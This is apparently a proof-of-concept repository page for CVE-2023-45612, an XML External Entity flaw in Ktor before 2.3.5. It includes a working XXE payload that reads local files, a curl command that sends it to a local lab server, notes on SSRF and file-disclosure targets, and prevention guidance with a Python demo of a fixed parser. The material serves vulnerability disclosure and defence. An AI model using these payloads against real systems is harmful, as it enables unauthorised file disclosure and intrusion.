
CVE-2023-45612 PoC: JetBrains Ktor code issue vulnerability

Associated vulnerability
Title: JetBrains Ktor code issue vulnerability (CVE-2023-45612)
Description: JetBrains Ktor is a web application framework from the Czech company JetBrains. JetBrains Ktor versions before 2.3.5 contain a code issue vulnerability: the default ContentNegotiation configuration is susceptible to XML External Entity injection (XXE).
Description: Ktor XXE Injection Proof-of-Concept (CVE-2023-45612)
Readme
# Ktor XXE Vulnerability Proof-of-Concept (CVE-2023-45612)

## Summary

Impact: Arbitrary file read via a crafted XML DTD containing an external entity reference.  
Root cause: An XML parser that resolves external entities.

This repo contains a vulnerable **Ktor 2.3.4** app configured to allow external entities so the XXE effect is visible.

## Description

Vulnerable Ktor (v2.3.4) application for an XML External Entity injection (CVE-2023-45612) proof of concept.  

CVE-2023-45612 is an XXE (XML External Entity) bug in Ktor's `ContentNegotiation` plugin when XML serialization is enabled, affecting versions before `2.3.5`.  
This vulnerability maps to [CWE-611: Improper Restriction of XML External Entity Reference](https://cwe.mitre.org/data/definitions/611.html).  
XXE falls under the [OWASP Top 10 A05:2021 - Security Misconfiguration](https://owasp.org/Top10/0x00_2021-introduction/#whats-changed-in-the-top-10-for-2021) risk category, but it is also an insecure design problem, since the root cause is an XML parser that places no restrictions on external entities. 

> Reported by Ulf Karlsson; see the [JetBrains security notes](https://www.jetbrains.com/privacy-security/issues-fixed/?product=Ktor).

## Affected components & versions

Ktor versions older than `2.3.5`

## Reproduction environment

This is my setup for reproducing the issue:

- IntelliJ IDEA [2025.2.4](https://www.jetbrains.com/idea/download/)
- Ktor 2.3.4
- JDK 21
- OS: Windows 10

## XXE explained
XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing.
By submitting an XML file that defines an external entity with a file:// URI, **an attacker can cause the processing application to read the contents of a local file**.  
For example, the URI `file:///c:/winnt/win.ini` designates the file `C:\Winnt\win.ini` on Windows, and `file:///etc/passwd` designates the password file on Unix-based systems.  
(Source: CWE-611, https://cwe.mitre.org/data/definitions/611.html)  

## How it works
A `POST` request is sent to the endpoint `http://localhost:8080/xml`.  
The request body is the XML file `exploit/payloads/xxe-demo-file.xml`, whose `<!DOCTYPE>` declaration defines an external entity with a `SYSTEM` identifier pointing at `exploit/etc/secret.txt` (a relative path, resolved from the directory the server runs in).  
> This could be any other file on the system that the server process is able to read.
  
**xxe-demo-file.xml**
```xml
<!DOCTYPE Mail [ <!ENTITY xxe SYSTEM "exploit/etc/secret.txt"> ]>
<Mail><title>&xxe;</title></Mail>
```
The XML parser (configured to allow DTDs) resolves the `&xxe;` reference by fetching the resource and inlining its contents into the document.  
> The external reference could also point at an internal HTTP endpoint, turning the parser into an **SSRF** primitive, or at a very large file in order to exhaust system resources **(DoS)**.

## Reproduction steps
1. Run the server:  
```bash
./gradlew run
```
2. The console should show:
```bash
Responding at http://127.0.0.1:8080
```
3. Send the XXE payload using curl:
```bash
curl -i http://localhost:8080/xml -H "Content-Type: application/xml" --data-binary @exploit/payloads/xxe-demo-file.xml
```
Expected result **(vulnerable)**:  
> Console outputs: `Received: <external entity data>`    

Expected result **(secure)**:  
> `400 Bad Request` or similar: the XML parser rejects the Document Type Definition instead of resolving the entity.

## Evidence
Run command:  

![Run app command](screenshots/run_app.jpg) 

Send XXE payload using cURL, and the result displaying injected file contents:  

![curl command and leaked file contents](screenshots/curl_command.jpg)

## Severity
Severity is **high/critical**: local file disclosure, SSRF, DoS, or other impacts depending on what the server process can reach.  
NVD Base Score: `9.8 CRITICAL` (CVSS v3) (https://nvd.nist.gov/vuln/detail/CVE-2023-45612)

## Prevention guidelines draft for developers
- Configure the XML parser not to resolve external entities (and, where possible, to reject DTDs altogether). If external entities are genuinely needed, implement a custom entity resolver with a request timeout, a limit on the amount of data retrieved, and an allow-list of the local resources it may read.
- Use resources like the [OWASP XXE Prevention cheat sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html), which covers XXE prevention implementation, specifically for various technologies.  
- Integrate SAST into CI, since it can find some instances of this weakness by analyzing source code.
- Track and analyze dependency versions and vulnerabilities.
- Implement secure coding standards at company level.
- Emphasize the integration of security throughout the SDLC, especially in the design and developer testing phases.
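The parser behaviour described under "How it works" and the custom-resolver advice in the first prevention guideline above, as an added example that is not part of the PoC repository or of Ktor: it uses Python's standard-library `xml.sax` (expat) parser so that it runs offline, builds the same DTD-plus-`SYSTEM`-entity payload shape as `xxe-demo-file.xml`, and parses it three ways: with external general entities resolved (the behaviour the vulnerable Ktor default exhibits), with them disabled (the fix), and through a hypothetical `AllowListResolver` that only serves small files below one directory and refuses everything else. The temp-file layout, the `AllowListResolver` class and its policy, and the `169.254.169.254` SSRF target are this example's own constructions; POSIX paths are assumed.

```python
"""Added example (not Ktor or PoC code): the DTD + SYSTEM-entity mechanism of
CVE-2023-45612 run through Python's stdlib SAX (expat) parser three ways."""
import io
import os
import tempfile
import urllib.parse
import xml.sax
from xml.sax.handler import EntityResolver, feature_external_ges
from xml.sax.xmlreader import InputSource

# Same shape as exploit/payloads/xxe-demo-file.xml; the target is filled in
# because the demo writes its own (constructed) files under a temp dir.
PAYLOAD_TEMPLATE = ('<!DOCTYPE Mail [ <!ENTITY xxe SYSTEM "{target}"> ]>\n'
                    "<Mail><title>&xxe;</title></Mail>")

def build_payload(target):
    """Return the XXE payload (bytes) whose external entity points at `target`."""
    return PAYLOAD_TEMPLATE.format(target=target).encode()

class TitleCollector(xml.sax.ContentHandler):
    """Collects the text of <title>, which is where &xxe; expands."""
    def __init__(self):
        super().__init__()
        self.in_title, self.parts = False, []
    def startElement(self, name, attrs):
        if name == "title":
            self.in_title = True
    def endElement(self, name):
        if name == "title":
            self.in_title = False
    def characters(self, content):
        if self.in_title:
            self.parts.append(content)

class AllowListResolver(EntityResolver):
    """Hypothetical hardened resolver (this example's own policy): serve only
    local files below `allowed_dir` of at most `max_bytes`. Remote schemes
    (SSRF), paths outside the directory (arbitrary read) and oversized files
    (resource exhaustion) are refused by raising, which aborts the parse."""
    def __init__(self, allowed_dir, max_bytes=4096):
        self.allowed_dir = os.path.realpath(allowed_dir)
        self.max_bytes = max_bytes

    def resolveEntity(self, publicId, systemId):
        parts = urllib.parse.urlsplit(systemId)  # POSIX paths assumed
        if parts.scheme not in ("", "file"):
            raise PermissionError(f"refused scheme: {systemId!r}")
        real = os.path.realpath(urllib.parse.unquote(parts.path))
        if os.path.commonpath([real, self.allowed_dir]) != self.allowed_dir:
            raise PermissionError(f"refused path outside allow-list: {systemId!r}")
        with open(real, "rb") as fh:
            data = fh.read(self.max_bytes + 1)
        if len(data) > self.max_bytes:
            raise PermissionError(f"refused oversized entity: {systemId!r}")
        source = InputSource(systemId)
        source.setByteStream(io.BytesIO(data))  # pre-read: SAX will not urlopen it
        return source

def parse_title(payload, resolve_external, resolver=None):
    """Parse `payload` and return the <title> text. resolve_external=True follows
    SYSTEM entities (as the pre-2.3.5 Ktor default did); False skips them."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    if resolver is not None:
        parser.setEntityResolver(resolver)
    handler = TitleCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(payload))
    return "".join(handler.parts)

def guarded_title(payload, guard):
    """parse_title behind an AllowListResolver; 'refused' when the guard bails."""
    try:
        return parse_title(payload, True, guard)
    except PermissionError:
        return "refused"

def demo():
    """Run the three configurations on constructed files; return the results."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        secret = os.path.join(root, "etc", "secret.txt")     # off-limits
        public = os.path.join(root, "public", "notice.txt")  # allow-listed
        for path, text in ((secret, "constructed secret value"),
                           (public, "constructed public notice")):
            os.makedirs(os.path.dirname(path))
            with open(path, "w") as fh:
                fh.write(text)
        results["vulnerable"] = parse_title(build_payload(secret), True)   # leaks
        results["fixed"] = parse_title(build_payload(secret), False)       # ""
        guard = AllowListResolver(os.path.join(root, "public"))
        results["allowed"] = guarded_title(build_payload(public), guard)
        results["secret"] = guarded_title(build_payload(secret), guard)
        results["ssrf"] = guarded_title(build_payload("http://169.254.169.254/"), guard)
    return results
```

Calling `demo()` yields `vulnerable` equal to the secret file's contents, `fixed` equal to the empty string (the entity reference expands to nothing), `allowed` equal to the public file, and `refused` for both `secret` and `ssrf`; in the last two cases the resolver raises before any file is read or any connection is attempted, which is the fail-closed behaviour a custom resolver needs. The `fixed` case is the equivalent of what the Ktor 2.3.5 change does: the DOCTYPE is still parsed, but the external reference is never followed.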

## References
- https://nvd.nist.gov/vuln/detail/CVE-2023-45612
- https://cwe.mitre.org/data/definitions/611.html
- https://capec.mitre.org/data/definitions/221.html
- https://medium.com/@iason.tzortzis/xxe-xml-external-entity-injection-explained-e8be5f1f7cd7
- https://ktor.io/docs/server-create-a-new-project.html#create-project-with-the-ktor-project-generator
- https://www.jetbrains.com/privacy-security/issues-fixed/?product=Ktor
- https://ktor.io/docs/2.3.13/welcome.html
- https://portswigger.net/web-security/xxe#exploiting-xxe-to-retrieve-files
- https://ssojet.com/parse-and-generate-formats/parse-and-generate-xml-in-ktor/
- https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
- https://owasp.org/Top10/A05_2021-Security_Misconfiguration/
File Snapshot

```text
[4.0K] /data/pocs/ecea89cc24856e3a48d7ba5ef0b6a83d95139a34
├── [1.0K] build.gradle.kts
├── [4.0K] exploit
│   ├── [4.0K] etc
│   │   └── [ 43] secret.txt
│   └── [4.0K] payloads
│       └── [ 99] xxe-demo-file.xml
├── [4.0K] gradle
│   ├── [1.0K] libs.versions.toml
│   └── [4.0K] wrapper
│       ├── [ 44K] gradle-wrapper.jar
│       └── [ 252] gradle-wrapper.properties
├── [ 27] gradle.properties
├── [8.4K] gradlew
├── [2.7K] gradlew.bat
├── [5.3K] README.md
├── [4.0K] screenshots
│   ├── [ 30K] curl_command.jpg
│   └── [ 45K] run_app.jpg
├── [ 129] settings.gradle.kts
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] kotlin
        │   ├── [1001] Application.kt
        │   ├── [ 101] Mail.kt
        │   └── [ 428] Routing.kt
        └── [4.0K] resources
            ├── [ 148] application.yaml
            └── [ 425] logback.xml

11 directories, 18 files
```